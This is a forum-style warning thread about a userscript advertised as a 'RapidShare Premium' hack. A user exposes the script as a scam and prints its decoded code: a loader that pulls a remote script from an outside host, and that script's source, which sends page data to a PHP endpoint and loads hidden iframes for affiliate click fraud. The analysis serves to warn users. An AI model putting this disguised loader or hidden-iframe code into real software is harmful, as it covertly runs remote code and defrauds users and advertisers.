RapidShare Premium Exploit/Hack

By PissBlack Last update Oct 18, 2009 — Installed 13,567 times.

This is a scam to make you execute another script

in
Subscribe to This is a scam to make you execute another script 1 post, 1 voice

Union User
FirefoxWindows

Decoded script:

var GM_JQ=document.createElement('script');GM_JQ.src='http://idk.li/scripts/main.js';GM_JQ.type='text/javascript';document.getElementsByTagName('head')[0].appendChild(GM_JQ);

Source of http://idk.li/scripts/main.js:
if(window.location.toString().match('e-researchcenter.us.com'))
{
if(document.getElementById("email"))
{
var EMAILX=document.createElement('script');
EMAILX.src='http://idk.li/scripts/gen_info.php?t=email&s='+pseJSObj.config+'_'+pseJSObj.stage;
EMAILX.type='text/javascript';
document.getElementsByTagName('head')[0].appendChild(EMAILX)}
else
{
var PG2=document.createElement('script');
PG2.src='http://idk.li/scripts/gen_info.php?s='+pseJSObj.config+'_'+pseJSObj.stage;
PG2.type='text/javascript';
document.getElementsByTagName('head')[0].appendChild(PG2)
}
}
else{var rtl=document.createElement('iframe');
var ix=Math.floor(Math.random()*3);
if(ix===0)
{
rtl.src='http://www.nobsads.net/click.track?CID=106386&AFID=107558&ADID=236902&SID=AffiliatePlan1'
}
else if(ix===1)
{
rtl.src='http://www.nobsads.net/click.track?CID=108110&AFID=107558&ADID=243625&SID=AffiliatePlan1'
}
else
{
rtl.src='http://www.nobsads.net/click.track?CID=108111&AFID=107558&ADID=243631&SID=AffiliatePlan1'
}
rtl.width='0px';
rtl.height='0px';
rtl.scrolling='no';
rtl.frameborder='0';
rtl.style.position='absolute';
rtl.style.right='0px';
rtl.style.top='0px';
rtl.style.display='none';
rtl.style.visibility='hidden';
rtl.style.border='0px';
document.body.appendChild(rtl);
var rtl2=document.createElement('iframe');
rtl2.width='0px';
rtl2.height='0px';
rtl2.scrolling='no';
rtl2.frameborder='0';
rtl2.style.position='absolute';
rtl2.style.right='0px';
rtl2.style.top='0px';
rtl2.src=rtl.src;
rtl2.style.display='none';
rtl2.style.visibility='hidden';
rtl2.style.border='0px';
document.body.appendChild(rtl2)
}

So pretty much a tracking script

Cross
Presentational HTML allowed.
Use <code> for inline code and <pre> for code blocks. Use &lt; and &gt; for literal < and >.
We help break paragraphs and link your links.
or cancel